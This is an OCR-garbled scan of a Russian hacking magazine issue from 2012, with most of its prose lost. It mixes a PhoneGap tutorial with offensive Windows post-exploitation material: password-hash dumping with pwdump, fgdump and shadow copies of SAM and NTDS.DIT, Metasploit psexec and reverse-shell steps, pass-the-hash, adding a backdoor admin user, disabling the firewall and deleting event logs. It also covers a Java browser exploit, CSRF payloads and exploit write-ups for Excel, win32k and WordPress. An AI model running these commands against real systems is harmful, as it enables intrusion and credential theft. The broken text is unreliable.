    n. , Magic Laten, Canon , . Hackes Oevelopes Kit, , >> >> .

    , n , ,

    . CONFidece 2.0. Niko . lus-) .

    , , . , . Nikon .

    r.1 5-10 ... ,

    , ?

    l , ~ , Pactical

    cyptogaphy . , , , . ... , , . ,

    . , . , , .

    r.1 ... ?

    , ?

    l , . ~ ,

    . - ,

    . ,

    . , . ,

    , , , .

    , 1 % , . , . , , IT,

    - : n >>. , .

    , , , . :::

    01 /156/2012 www.epidemz.net

  • Preview

    11, n n n n

    : n ~ n ~n ~ n . . n n . n n

    n n, n n Lotus Domino Contolle n n .

    n, n, n I .

    PCZONE

    36 HTML5

    And oid iOS, ? n. n n n .

    500 n, . n

    n .

    01/156/2012

    30 . .

    ? n n, n , n

    n .

    MALWARE

    DUQU

    n ,

    n n n

    Stuxnet.

    ? - .

    , .

    I! , MBR, n, 5 nn

    .

    035

    www.epidemz.net

  • PCZONE

    PhoneGap:o HTML5

    - , , .

    todo list Adroid iOS, , .

    Objective-C Java , , PhoneGap.

    ._ .....

    ~-----

    ---

    -

    ... .....

    ...

    iOS

    036

    , Windows 8, , , , n n HTML5. , - , - , n n, . , n n n n HTML, JavaSc i pt

    CSS!, PhoneGap. n n n n nn n: iOS, Andoid, Windows Phone, lk, WebOS, Symian Bada.

    n n n [n, Objective-C iOS), API . , n n n,- HTML5 PhoneGap API. n L-, , ! API n n , n n n

    : , n, [ ), n , , ! ), . . , - . n jQuey Moile Secha,

    , [ n ) . n , n , n nn . - .

    n iOS- -, AppStoe, n

    :). : , , , , Andoid. , n ,

    01/156/2012 www.epidemz.net

  • .

    , . iOS .

    . n n .

    cdiv data-role= "page" data-dom-cache= "true" class="page-map" id= "index" >

    cdiv data-role= "header" > hl > n / hl > href= "#points" class= "ui-btn-right" id= "menu-points"

    data-transition= "pop" >To c/a> c/div> cdiv data-role= "content" > cdiv id= "map-canvas" >

    ! -- --> c/div> c/div> c/div>

    data-dom-cache="true" , . data-transition="pop",

    >. , jQuey Moi l e, [ it.ly/vtXXM I .

    PHONEGAP

    , PhoneGap

    > . ! . PhoneGap Build [build .phonegap.com l n .

    . , , .

    - PhoneGap, . lgithub.com/ phonegap/phonegap-p luginsl,

    iPhone, Android, Palm, Bla ckBerry. iOS 20 r: BarcodeScann er [ -!. AdPI-ugi [ iAdl, NativeCont rol s l iOS l .

    037 www.epidemz.net

  • PCZONE

    n :

    cdiv data-role="page" data-dom-cache="true" class="page-pints" id="points" >

    cdiv data-role="header" >

    href="#" data-theme="b" data-icon="delete" id= "delete-all" >Ya chl>Toc/hl> href="#index" class="ui-btn-right" data-transition="pop" data-direction="reverse" >

    cdiv> cul id="list" data-role="listview" data-inset="true" data-split-icon= "delete" >

    c/div>

    n nn data-tansition=>>pop>>, data-diection=>>evese>>, .

    nn . , .

    , API Google Maps, :

    var latlng = new gm.Latlng( this .options.lat, this .options.lng);

    t his .map = new gm.Map(element, {

    });

    zoom: this .options.zoom, // center: latlng, // mapTypeid: gm.MapTypeld.ROADMAP, //

    disaleDoueClickZoom: true , /1 / disaleOefaultUI: t rue

    /1

    Gm- n, Google Maps.

    . - :

    t his .person = new gm.Marker({ map: t his .map, icon: new gm.Markerlmage(PERSON_SPRITE_URL,

    new gm.Size(48 , 48 )) });

    PERSON_SPRITE_URL n n Ggl -. -maps.gstatic. com/mapfiles/c/mod scout/cb scout spite api OO . png .

    , , n, , click:

    gm.event.addlistener(this .map, 'click' , f unct i on (event) self.requestMessage( function (err, message) { 11 , ut , if (err) return ; /1

    038

    EnableViewportScale Externa!Hosts

    ltemO ltem 1 ltem 2 ltem 3

    MediaPiaybackRequiresUserAction

    n ExternaiHosts

    // self.addPoint(event. latlng,

    00 Boolean NO Array . (41tems) . String csi .gstatic.com String .googleapis.com String maps.goog le.com String maps.gstatic.com Boolean NO

    self.options.radius, message); self.updatePointslist(); // q n }); }, false );

    n - . n n n

    . nn Geolocation AP I !, n n l:

    if (navigator.geolocation) { /1 ,

    function gpsSuccess(pos) { var lat, lng; if (pos.coords) {

    }

    lat pos.coords.latitude; lng pos.coords.longitude;

    el se lat lng

    pos.latitude; pos.longitude;

    self.movePerson( new gm.Latlng(lat, lng)); /1

    /1 /1 window.setinterval( function () { /1 n n navigator.geolocation.getCurrentPosition(gpsSuccess, $.noop, {

    enaeHighAccuracy: true , maximumAge:

    }); } , ); }

    movePeson n n n getPointslnBoundsll n, n

    - . n- n ? HTML5 n

    locaiStoage, n !n , l. , n, , !

    - , n n . n - n - Safai Chome. ,

    n .

    , n , , n WebKit . ~ n

    n h ~ -n n -

    01 / 156/ 2012 www.epidemz.net

  • iOS

    . - (n Denwe XAMPPI, ,

    . n , . , , n PhoneGap, , ,

    . , i05-. , PhoneGap IDE .

    n i05,

    n 05 10.6+ ( 05 10.61, Xcode i05 50 . 50 , n Apple . Xcode i05 50 ldeve l ope. app l e . com/devcente/ i os/index.act i on l . ,

    4 . , ' Apple ( n , 5t, !. ,

    i05 Objective-C. PhoneGap,

    PhoneGap i05. lhttps://g ithub .com/callback/phonegap/zipba ll /1.2 .01,

    i05 . , Xcode PhoneGap. , IDE -

    01/156/2012

    PhoneGap: HTML5

    . , , n Run- iPhone/iPad PhoneGap. , index.html ,- . ,

    n n, n www. ,

  • PCZONE

    i f (button_id === 1) { // self.removePoint(point);

    } }, TILE );

    , n,- , n i.i n . , n ln , l ,

    Ph oneGap:

    navigator.geolocation.watchPosition(function (position) { self.movePerson( new gm.LatLng(

    position.coords.latitude, position.coords.longitude));

    }, fu nction (error) { navigator. notification.alert( 'code: + error.code + '\nmessage: ' + error.message, $.noop, TILE );

    } ' { frequency:

    }); - , . n Run

    , n iS -' nn n .

    iPhone, iPod iPad n, n Xcode. n nn n . :1. : n n

    PhoneGap, n, n n . .

    Appcelerator Titanium lwww. appceleato.com l. Titanium n Andoid iPhone, n lk.

    , n n IDE . n Tita-nium n, n

    [ $49 ]. $120 . l t Titanium , n 25 . n n n Apache 2.

    Corona SDK lwww.anscamoile . com/coona l . n - iOS An-doid. . ,

    OpenGL. n , - : $199 n $349 iOS Andoid. n n IDE .

    n , JavaScipt.

    01.0

    ~ ~

    : 56.84484567007557 ...

    : 56.84583899763894 ...

    hG-n

    n iOS, iOS ! , nn iOS D eve l ope

    Pogaml. n n n App le, n

    IAndoid, Windows Phonel n . , , n n n n - . n $99

    n . Apple , n n . n n

    n iOS n Stoe. , $99 n n , n - .

    nn n - n iS - ! , n n n : it .l y/tD6xA!I . , n

    . . ?

    n -n n n n iOS n PhoneGap. n Objective-C,

    n n n , n n API PhoneGap. nn n, n An do id Windows Moile 7, , - n n, n ! : phonegap . com/sta t l . n,

    n n Ph oneGap, n lphonegap .com/apps]. PhoneGap-

    n n n n. n , n n,

    . n n, HTML+JS - n n , n n . , Ph one Gap

    n Nitoi n l n n GitHub: github .com/ phonegap l. ,

    n n Ni toi n Adobe . , nn n n n n ? ::

    01 / 156/201 2 www.epidemz.net

  • . .

    www.epidemz.net

  • PCZONE Ant la.zhukov!Oreal.xakep.rul

    WINDOWS-APOE WINDOWS-CCTEM

    , , ,

    , NTLM. .

    .

    ? , . : S-, LM/NTLM-xe

    ; LSA, LM/NTLM-xe

    , ; , Sh-

    , ! , , ! .

    , -. : !

    , , . 7

    .

    1 PWDUMP FGDUMP , . NTLM/LM-xe .

    , DLL- SeDebugPivilege . ,

    la NT AUTHORIY\SYSTEMI . , : ,

    ! LiveCDI, , -t lwww.piotrbaia .com/all/kon-boot l, .

    l NT AUTHORITY\ SYSTEM l, EasyHack . . pwd ump lwww.foofus .net/-fizzgig/pwdumpl fgdump lwww. foofus .net/-fizzgig/fgdumpl.

    , . :

    pwdump localhost fgdump . exe

    . 127.0.0.1.PWDUMP l ! 127.0.0.1 .CACHEDUMP

    l ! .

    01/156/2012 www.epidemz.net

  • , , .

    , , pwdump, :

    > pwdump - mytarget . log -u MYDOMAIN\someuser - \ ' lamepassword' 10 .1.1.1

    10.1.1 .1 - , MYDOMAIN\ someuse- , la mepasswod-

    , mytaget.log - . pwdump, fgdump , :

    > fgdump .exe -f hostfile . txt -u MYDOMAIN\someuser - 10

    hostfile.txt- , , - .

    , ! !.

    , fgdump.exe.

    2 VOLUME SHAOOW SERVICE pwdump fgdump , , , . , . ,

    SAM, , . , , - SYSTEM . , , - . - , , , . , , , .

    , >> , Volume Shadow Sevice ! ! .

    Windows S v 2003. , , System State ntbackup

    IVolume Shadow f Shaed Foldes l . ,

    l , SAM SYSTEMI, .

    , Wi ndows , , . , . , -

    , . _ LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CuentVesion\ Winlogon\cachedlogonscount 0>>.

    , . .

    01/156/2012

    Widows-apoe

    w n n n pwdump

    n n n Windows Cedentials Edito (WCEI

    , vssown.vbs itools .l anmaste53 . com/vssown .v bs l, . . : cscript vssown. vbs /start.

    : cscript vssown.vbs /create. : cscript vssown. vbs /list.

    . Device object \\ ?\GLOBALROOT\ Device\HaddiskVolumeShadowCopy14 >> ! 14 - !. . 1. :

    \\?\GLOBALROOT \ Device\HarddiskVolume5hadowCopy14\ wi ndows\system32 \ config \ SYSTEM .

    \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\ windows\system32 \config\SAM .

    2. , - SAM inside l i n si d ep o.com/us/saminsi d e.shtm l l

    .

    _ ! , , ,

    ! , . ,

    SAM SYSTEM. Active Diecto y NTDS.DIT, :

    \\?\GLOBALROOT\ Device \ HarddiskVolume5hadowCopy14\ windows\ntds\ntds.dit .

    , SYSTEM. , ? SYSTEM NTDS.DIT,

    n n ? , , n NTDS.DIT , .

    Csaba t , NTDS.DI T .

    csa babata.com/down l oads/

    www.epidemz.net

  • PCZONE

    ntds dump hash.zip. , . n n BackTack5 !n Linu-],

    n . , . libesedb:

    cd libesedb chmod + configure ./configure && make

    . , :

    cd esedbtools . / esedbdumphash .. / .. /ntds .dit

    /l ibe sedb/esedbtools/ntds.dit.expot/datatable. . ,

    SYSTEM:

    cd .. / .. /creddump/ python ./dsdump.py .. /SYSTEM

    . /libesedb/esedbtools/ntds.dit.export/datatale

    ! ! , ! ] . , : python . / dsdumphistory . . . /system .. /libesedb/esedbtools/ntds.dit.export /datatale.

    , , ! ] .

    ' HASHGRAB2+ SAMDUMP2

    , . , , LiveCO !, Offline NT Passwod & Registy Edi t o],

    - , .

    HashGab2l py 1 337 . get- oot . com /too l s/has h gab2 . .!] samsump2 l soucefoge.net/pojec t s/ophcack/f iles/ samdump2/ 2.0.1],

    Liv- . HashGab2 Windows-pae, , n samdump2

    SAM SYSTEM .

    .. - ..... - ... ~"" ... "' 1000 e su~_ . .. s.o 1011.1: O u

  • meterpreter > set payload widows/meterpreter/reverse_tcp meterpreter > set rhost ( ] meterpreter > set smbpass (

    ] meterpreter > set smbuser [ ] meterpreter > set lhost [ ] meterpreter > exploit meterpreter > shell -

    , , . , . ,

    getsystem. , MS09-012, MS10-015 [KiTrapDDI .

    6 PASS-THE-HASH NTLM . , . -

    :1. - , Pass The Hash, 1997 . Pass-the-Hash Toolkit. [oss. coresecu rity.com/projects/pshtoolkit .htmll: IAM.EXE, WHOSTHERE.

    GENHASH.EXE. , GENHASH LM- N- . WHOSTHERE.

    , -, .

    , : , / NL- . IAM. - , [ , , . .l,

    , , .

    , NL-, ,

  • . , , Windows-ccee, ? . ,

    ? -, .

    n n nwn nn . n , , n n ( nmap, - w), .

    ipconf ig /all

    ipconfig /displaydns

    netstat - nabo

    netstat -s - [tcpludplicpmlip]

    j netstat - : route print

    .

    D NS-e . . ........................................... -~

    /U-. - , , .

    ' etsta t - [, UDP, ICMP, IPI. : .. j . : .

    '''''''f' .,... .... ...................... . . ..... ....... . ..................... . ..................... .

    , , 445. j netstat - 1 findstr :445

    net view

    net user %USERNAME% /domain

    j net accounts ... ............................. ..... ................................ .

    j .. ~ .et ~.c~~.unts /do~~i~ ............... . ! net localgroup administrators

    net localgroup administrators /domain ............ .

    !. ".~t .~.~nfig ~o~.~~-t ~ ti~-~ ................. ,.... .. .. . : net share ;, ....

    SMB [!.

    [ '/domai', l. , , , . .

    [ ! .

    .

    .

    >> .

    , NetBIOS, , , , . . ....... .... ... .... ............................ ......................... ... .................... .... ....................................................................... .

    S - .

    ~ - R- . . . . . ...... ... ....... ....... .... ... ... ........ ....... ...... ................ ......................... .... . ....................................... ..

    : type %WINDIR%\System32\drivers\etc\ j hosts hosts.

    www.epidemz.net

  • whoami

    whoami /all

    qwinsta

    v

    set

    systeminfo (XP+I

    qprocess

    n enna - . (n~~ : n ( r ), , , , r nr . .

    ? . '/all' 510 , 510 , !

    ? ! .

    , , - . R- ! !, .

    ( uame !, , . . ................ ........... ... .... ... ................... ...... ...... ... .................. . .. ......................................... .

    - . SET , : . USERDOMAIN, USERNAME, USERPRO-; FILE, , LOGONSERVER, COMPUTERNAME, APPDATA, ALLUSERPROFILE. .

    ; , , , : , , .

    ~ , . ~ , 10 , PID .

    . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . ................. . ... ~ ............ ~.. .. . . .. . . .. . . . . . .. . . . . . . . . . .. . . . . . '...... . ............ . '............ . .. . . ........ . ......... . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . .. .. .. .. . . . . . . . . . ............. ~

    ; . ~~~ ~ .................................... J. .. ~~.~~~~ . ~.~~~ .. :~~~~.~., ~~.~~~~.~. ~~~.:' .~.' ......................................................... ! schtasks /query /fo csv /v >

    %% ~ csv, .

    at

    , , , . , SYS-TEM ( Wi7x64l. , , - do_somethig.bat SYSTEM 15:41 , :

    at 15 :41 / interactive "d:\pentest\do_somethig.bat" , .

    . , ............................................ ; ............................ .. .............. ..

    : schtasks (XP+I

    net start sc query

    sc getkeyname "" sc queryex ""

    tasklist (+)

    taskkill [/f] /pid

    ~ , . at, .............. , .: .. ~~.~.~~.~.~~ . ~~.~~~ ~~~~~.~~ .~~~~. ~~~~~~.~~~~ .~~~.~~ .~.~~~ .~.~~.~.~~~ ~ l~~.~~:.~.~.~.~. ~~~ ~ ~ 1 ................. , .... .

    key . , PIO .

    ................. ... ... .......................................................................

    j . ......................... . ......................... .

    taskkill [/f] /im PIO

    .... , ............. ,

    .......

    ! . ~.~~.til ~si n~~ .~r.i~eS. .................... ......... ~.~~.~.~~.~.~~.~:.ll\. ~ ~~~~ l~~ .~.~~~~~.~~~ ~ ~:.~~~~ .. ~:..~~ ~.~~~.~~~.~~~~~. : ............................................... . : gpresult /z : - . ................................... .-.................................................................. ....................................................................................... , ... , ............................................. ........... :

    wevtutil el

    : wevtutil qe

    nor. , noro. n , n .

    , (, . . !.

    .

    : .. ~~~~.~.~i~ c' .. ~.~~.~~.~.~.~~ ........ . ...... . .... ~~~~~~~ ~.~~~~~~' ~~~ ............ ............ ...... ................ ..... ................... ............... ............................................................... . : del %WINDIR%\*.Iog / /s /q /f WINDOWS.

    www.epidemz.net

  • %windir%\System32\cmd.exe / ''%SystemRoot%\syst em32\Dism.

    /online /get-features

    Windows - n n no n n n. - n - nn.

    , . Windows Vista SP1/7/2008/2008R2, no , te lnet ft- ..

    ................................................................... .

    %windir%\System32\cmd.exe / ''%SystemRoot%\system32\Dism.

    " /online /enaie-feature 1 featurename:TFTP

    Ntsd -server tcp:port=1337 cal.exe Ntsd -remote tcp:server=,port=1337

    net use

    reg save HKLM\Security security. hive

    n TFTP. F- t ftp.exe .

    Windows Vista ntsd.exe, system32. . [ ), - .

    [ ). , . NTSD Backd oo.

    i .

    - , n n. n: w , , n,

    (n, n n).

    ~ security . , , system. ..................................................................................... '" "" .. ... .. ....... .. . .................. ................................ ..

    .. ~~~ -~-~-~--~~-~-~-~~-~~--~--~. :~ ~~~ ........... ! ... .. ~~--~-~- -~-~-~~~ -~-~~~~-~-~-~-~ - SAM, ~ . ~~~~ - ~:.~~~~--~~ -~--~-~~-~~-~~~-~-~~~ : ............................. .......... .......... . add [\\ etiPaddr\] [Re Do- ! [ TagetiPadd l. 9

    . ][\ ] g g : , [ : Oata, maln ~ : REG_BINARY, : fe340eadl . reg export [RegDomain]\[Key] [FileName]

    reg import [FileName]

    .. ...................... "........... ........ . ........... .. ..

    ~ n .

    .

    reg query [\\TargetiPaddr\J [Reg- Domain]\[ ] /v [Valuename!] ; n n .

    tree C:\/f /> C:\output_ of_tree.txt

    dir \ /s / 1 find /1 "search_string"

    , , . w , , : sam_backup.dat? w, ,- , . :

    : , .

    d i 1\1 1/sl base 1/bl seac h_st i n g, .

    www.epidemz.net

  • CWMIC

    , , -WMI (Windows Management lnterfacel. , WI- (WMICI: , , .

    ~ 1

    wmic baseboard get Manufacturer, Model, Product, SeriaiNumber, Version

    wmic nicconfig get caption, macaddress, ipaddress, DefaultiPGateway

    wmic nicconfig where "IPEnaed = 'TRUE ' and DNSDomain 15 NOT NULL" get DefaultiPGateway, DHCPServe r, DNSDomain, DNSHostName, DNS -ServerSearchOrder, IPAddress, IPSubnet, MACAd-dress, WINSEnaeLMHostsLookup, WINSPrimary-Server, WINSSecondaryServer /format :l ist

    wmic printer get Caption, Default, Direct, Descrip-tion, Local, Shared, Sharename, Status

    wmic os get bootdevice, caption, csname, current-timezone, installdate, servicepackmajorversion, servicepackminorversion, systemdrive, version, windowsdirectory /format:list

    wmic product get Caption, lnstaiiDate, Vendor

    wmic path win32_product where "name = ' Soft-ware Update"' call Uninstal

    WMI . , W I - lcompu tesystem, bios, ,

    , baseboadl n. . .

    : , -, I- , .

    .

    n , .

    .

    .

    : Softwae Update.

    , . .

    netuserhackerhacker/add

    : net localgroup administrators /add hacker . net localgroup administrators hacker /add ; ....................................... .. : net share nothing$=C:\ /grant:hacker,FULL /unlim-: ited ...........................................................

    : net user username /active:yes /domain

    netsh firewall set opmode disae

    wmic product get name /value wmic product where name="XXX" call uninstall/ nointeractive

    rundll32.exe user32.dll, LockWorkStation

    hacke .

    hacke .

    : hacke .

    - ( , ) , .

    Windows.

    , - ( , ).

    ( ) . ; .......................................................................................... : ...................................... .

    www.epidemz.net

  • /S
  • EASY

    JAVA

    , Java, , . , Java , Flash, , . ?

    , Java , . javateste.og/

    vesio.html . ,

    . ? ,

    - CVE-201 0-4452, . , Metasploit'e:

    11 : use exploit/widows/browser/java_codebase_trust

    2) : set URIPATH test.php set LPORT 88

    3) : Set payload java/ meterpreter/ reverse_tcp

    4) : Exploit

    tt :]. , Java ? . : -

    , J v- .

    , , ,

    . ? ':] JavaScipt, Jv-,

    . , , l defco- r ussia . u/wa ll. t x t ]. SET [Social gi Too lkit].

    B ackTack 5 l www.social-e g i ee . og]. SET , . SET :

    1) Website Attack Vectos; 2) The Java Applet Attack Method; 3) Web Templates [

    Site l ]; 4) Gmail Gmail; 4) lmpotyouown executae,

    .

    - . , , Java .

    , ? ? ? ?:] , , , , . , [ :11, . , - ,

    . : SMTP [25/I , Gmail Mail.u.

    , , , , , , - . ? 150 . , IP.

    lwww. proxy . ru l, , .

    . , security. nov. u ,

    , , . :1 [ * ], [

    l :

    pro)(y -25

    01/156/ 2012

    - . , . - . , ?

    [ ). , , - [ www.example.com:25l. , . , nmap . , UOP ICMP, , -. , .

    Proxy server

    0 Use proxy server for your LAN (These settigs will t apply to dial-up or VPN conections),

    Address: ~['iiiiiiiiiiiiiiiiil]l Port: ~ 1 Advaced ... J Bypass proxy server for local addresses

    051 www.epidemz.net

  • 1 EASY

    REVERSE-POKC

    ~ , vs. ? , -, [) -

    . ? . , vs-

    -, WAF SS L- cepepa, , [, ) .

    . , [ , - ?). .

    vs- - . ?

    - . . , X-Fowaded-Fo, , ! , -

    , .

    lgoo.gi/VObeW). , RFC 2616 1.1, , Fowads . , , TR ACE OPTIONS. - .

    HP-traceroute. Squid reverse-npoc Wikipedia.org

    reverse proxy

    , , , . , GET POST,

    . , TTL I- . , - , - taceoute. , R- -, RFC, GET

    MaxFowads. ta ceo ut e, , I- . :

    HTTP-Traceroute.py -t www.victim.com -m (TRACE/ GET/POST)

    - CSRF .r\!

    , CSRF [Coss Site Request Fg, ) . , - . , ,

    [, ) , [ , ) . ,

    , , ,

    . , , n JavaSc ipt . ,

    - - . . G- : http:// seve.com/change_passwod.php?NP=ew_pass, ew_pass-

    , . , L' :

    ,

    052

    L LJ

    . GET-an poc- . , S?

    :

    document.passwd.submit();

    l XML-anpoca? - XM L-a np oc. :)

    document.passwd.submit();

    , , . ; ) .

    01 /156/2012 www.epidemz.net

  • EASY

    er..i.r.~t

    !, , digital foensicsl- , .

    , ,-

    . , : ; n ;

    ; DLL- ; ; ; ; Vitual Addess Descipto; ; . .

    , , , , . Volatility 19QQ]L Hi5ip l. Python'e Windows ! XPI, , 32- .

    , , n . , n .

    ! !, , n

    . , ,

    MoonSols Dumplt ihttp://goo.gi/BY1QN J. - : .

    . , n , ! ,

    USBI. , - ? Volatilit y. , Python'o, stndln- , .

    , :

    volatility.exe imageinfo -f d: \test .raw

    01 /156/2012

    ---

    : imageinfo- ; f d:\te st.aw- . Volatility - . ;l IWinXPSP3x86l, . , ?

    - :

    volatility pslist -f d:\test.raw --profile=WinXPSPx86

    , , :

    volatility netscan -f d:\test.raw --profile=WinXPSPx86

    - , , , SAM, - LSA?

    Windows .

    volatility hivelist -f d:\test.raw --profile=WinXPSPx86

    hivelist- , .

    , :

    volatility hashdump -f d:\test.raw --profile=WinXPSPx86 - ls -s exelsese

    : hashdump- ; 103560- System; s 180560- SAM.

    , . , . , , . Volatility. , ,

    .

    053 www.epidemz.net

  • /

    -

    . , , ,

    , , .

    051,

    [ivinside.iogspot.coml [115612, . , .11

    1 n Microsoft Office 2007 Excel.xlb CVSSV2 9.3

    111111 111 11 11 11111 1111 111 11 IAV: N/AC :M/AU: N/C:C/J:C/A:C) []] : 5 2011 .

    : Aniway, abysssec, sinn, juan vazquez. CVE: CVE-2011-01 05.

    n , i Excel.

    .

    f:J!Iii Excel

    , !, ). xl b.

    01 / 156/ 201 2 www.epidemz.net

  • @ start () ; (CLASS SESSION ACTION ) ;

    SsessionAction = - Sessi~nAction () ; SselectedDocuments = SsessionAction ->get () ; if( removeTrailingSlash ($sessionAction ->getFolder ()) == getParentPath ($ POST [ ' id ' ])

    && sizeof ($selectedDocLJments )) {

    if(($ key = array search (basename ($ POST [ ' id ' ]) , $selected0ocuments )) !== false ) {

    }

    $selected0ocuments [$key ] = $ POST [ ' value ' ] ; $sessionAction ->set ($selectedDocuments ) ;

    baseame ( $ POST [ ' icJ ' ]) . "\n "; displayArray ($selectedDocuments ) ; } elseif( removeTrailingSlash ( $ sessionActio ->getFolder ()) -- removeTrailingSlash ($ POST [ ' id ' ])) {

    S sessionActio ->setFolder ( $ POST [ ' id ' ]) ; } writelnfo (ob get l ()) ; ajax _ save _name .php

    BIFFB. , . Bl FF- :

    BOF = workbook globals Workbook globals

    EOF BOF = worksheet

    Sheet records EOF BOF = worksheet

    Sheet records EOF

    :

    ID ( ) , sz ( ) (sz )

    (ID ] - . . : BOF IBegi Of File] EOF IEd Of Fil e].

    BOF, :

    BOF , BIFF8 . ~;

    2 89 ID 2 01 2 f' 2 2 ***.fcH 4 2 ID 2 4 12 4 Excel,

    F-: s - Workbook globals

    01 /156/2012

    - Visual Basic module 1 - Works heet - Chart

    4 - BIFF4 Macro sheet 1 - BIFF4 Workbook globals

    BOF 7. , . sub_3 0199E55.

    . . , , ,

    .

    .text:esF8e call su_11

    .text:e5F835 cmp , h

    .text:e5F838 mov [ebp+var_ED4] , .text:e5F83E jz l_54488 .text:e5F844 call su_11 .text:e5F849 mov , [ebp+var_EDC] .t ext:e5F84F imul , [ebp+var_Fee] . text:e5F856 mov edi, .text:e5F858 mov , [ebp+var_EEe] .text:e5F85E lea , [ ++ ] .text:e5F862 call su_l .text:e5F867 push eFFFFFFFDh . text:e5F869 edx .text : e5F86A sub edx, . text:e5F86C add , edx .text:e5F86E push ; Dst

    . text:e5F86F push ; int

    .text:e5F87e mov , edi

    .text:e5F872 call sub_e199E55

    , sub_30199E55 , . , .

    055 www.epidemz.net

  • /

    puic static checkFile ($name ) { if ($GLOBALS [ 1 config uration 1 ][ 1 file k list l ] != 11 ) {

    $acklist = explode (" , ", $GLOBALS [ 1 configLJration 1 ][ 1 file k list 1 ]); } else {

    $ acklist = (); } $ acklist [] = 1 pt1p 1 ; $extension = pathinfo ($name , PATHINFO_EXTENSION ); foreach ( $ acklist as $value ) {

    if ($extension == trim (mb str-tolol..rer ($valL1e ))) { throw EfrontFileException (_YOUCANNOTUPLOADFILESWITHTHISEXTENSION .

    1 .$extension , EfrontFileException : :FILE IN BLACK LIST );

    1- CheckFilell

    .text:30199E0 cmp edi, [esp+4+Dst]

    .text:30199E4 ja loc_303EE1B7

    .text:30199 E A mov , [esp+4+arg_0]

    .text:30199EE push

    .text:30199E F mov , dword_30F72C0

    . text:30199E75 push .text : 30199E7 mov , nNumberOfBytesToRead .text:30199E7C push esi .text:30199E7D mov [esp+l0h+Dst],

    . text:30199E93 mov , [esp+l0h+Dst]

    .text:30199E97 push esi ; Size

    . text:30199E98 lea edx, dword_30FEB8[ebx]

    .text :30199E9E push edx ; Src

    .text:30199E9F push ; Dst

    . text:30199EA0 sub edi, esi

    .text :30199EA2 call memcpy

    . text:30199EA7 add [esp+lCh+Dst], esi

    .text:30199EAB add , esi .text :0199EAD add esp, 0Ch .text:30199EB0 test edi, edi .text : 30199EB2 mov dword_30F72C0, .text:30199EB8 jnz loc_301E0DB

    , .

    , / GS / SAFESEH . , /GS- MS Visual Studio, , . , ,

    . cookie, . 64- , , coo kie. , ,

    . - . /SAFESEH S- .

    , , n

    . , . Visual Studio

    / SAFESEH

    056

    -. n

    , n . , . memcpy, nepen , / GS . ,

    esp . , ca ll esp .

    i(.1;ldfifi Microsoft Office Excei2007/Microsoft Office Excel2007 SP2 .

    ,_i,J!IiitJ:I , .

    2 MS11-077 Win32k Null Pointer De-reference Vulnerabllity CVSSV2 ~2 111111 111 111 11 11111

    1]] : 22011 . : KiDebug. CVE: CVE-2011-1985.

    11111 [AVL/AC:L/Au:N/C:C/1 /)

    wi n32k.sys , .

    >> n.

    IJ34!Jii :

    .text:BF9140C0 ; _stdcall NtUserfniNCBOXSTRING(x,x,x,x,x,x,x)

    .text:BF9140C0 _NtUserfniNCBOXSTRING@28 proc near CODE XREF: xxxDefWindowProc(xJx,x,x)+E [ p

    . text:BF9140C0 NtUseressageCall(x,x,x,x,x,x,x)+l[p

    .text:BF9140C0

    .text :BF9140C0 WND dword ptr 8

    . text :BF9140C0 arg_4 dword ptr 0Ch

    .text:BF9140C0 arg_8 dword ptr 10h

    .text:BF9140C0 arg_C dword ptr 14h

    .text:BF9140C0 arg_10 dword ptr 18h

    .text:BF9140C0 arg_14 dword ptr lCh

    .text:BF9140C0 arg_18 dword ptr 20h

    01 /156/2012 www.epidemz.net

  • RETURIJ t o EXCEL . O II OEE frooo f:L .7

    .text:BF914ece

    .text:BF914ece mov edi, edi

    .text:BF9148C2 push .text:BF914eC mov , esp . text : BF9148CS mov , [ebp+WND)

    ; WND == exffffffff (-1), .text:BF9148C8 mov , [ecx+2eh ) BSOD

    NtUse MessageCall NtUsefniNCBOXSTRING , CB _ADDSTRING:

    .text :BF88EE6B ; i nt __ stdcall NtUserMessageCall(int, int, int UnicodeString, PVOID Address, int, int, int)

    .text:BF88EEB1

    .text:BF88EEB4

    .text:BF88EEBB

    .text:BF88EEBC

    push movzx

    push push

    [ebp+arg_18) ; int , ds:_MessageTae[eax] int [ebp+arg_le) int

    . text: BF88EE BF and , Fh

    . text : BF88EEC2 push [ ebp+Address] Address

    .text :BF88EECS push [ebp+UnicodeString] ; int

    . text: BF 88E EC8 push [ ebp+arg_ 4] ; int

    . t ext: BF 88EECB push esi ; int

    . text : BF 88E ECC call ds:_gapfnMessageCall[eax*4 ) ; NtUserfniNSTRINGNULL(x,x,x,x,x,x,x)

    . rdat a:BF998D68 _gapfnessageCall dd offset _NtUserfnNCDESTROY@28

    .rdata :BF998D68 ; DATA XREF: NtUseressageCall(x,x,x,x,x,x,x)

    . rdat a :BF99eD68 ; NtUserfnNCDESTROY(x, x,x,x,x,x,x)

    .rdata :BF998D6C dd offset _NtUserfnNCDESTROY@28 ; NtUserfnNCDESTROY(x,x,x,x,x, x,x)

    .rdata:BF998D7e dd offset _NtUserfniNLPCREATESTRUCT@28 ; NtUserfniNLPCREATESTRUC(x,x,x,x, x,x,x)

    . rdat a: BF998DD4 dd offset _NtUserfniNCBOXSTRING@28 ; NtUserfniNCOXSTRING(x,x,x,x,x, x,x)

    ,

    SendMessageCallback((HWND)- l ,CB_ADDSTRING, e, e, e, e);

    SendNotifyMessage((HWND)- l ,CB_ADDSTRING, e, e);

    01 / 156/201 2

    , - BSoD:

    CB_ADDSTRING 14 CB_INSERTSTRING 14 CB_FINDSTRING 14

    CB_SELECSTRING exe14D CB_FINDSTRINGEXACT 1s LB_ADDSTRING LB_INSERTSTRING 11 LB_SELECTSTRING 1 LB_FINDSTRING exelBF LB_FINDSTRINGEXACT 12 LB_INSERTSTRINGUPPER exelAA LB_INSERTSTRINGLOWER l LB_ADDSTRINGUPPER 1 LB_ADDSTRINGLOWER exelAD

    .,.,,Jdjfi Windows SP3/XP SP2 64, Windows 2003 Sv SP21+ itanium,x64l, Windows Vista SP2/ SP2 64 , Windows Sv 2008 SP2 32/64/ itan ium, Windows 7 32/64 , Windows 7 SP1 32/64, Windows Sv 2008 2 x64/i tanium, 2 spl x64/itan ium .

    f"jJ!IijiJ:I MSll-077, .

    3 Wordpress Zingiri Web Shop Plugin CVSSV2 ~5 11111111 1111 11 11111111 1 1111 111 1

    I:N/AC:L/Au:N / C: / 1: P/A:PI l1

    WodPe ss . , ,

    . - -,-

    , . Egidi o Romano aka EgiX . EgiX 13 , , .

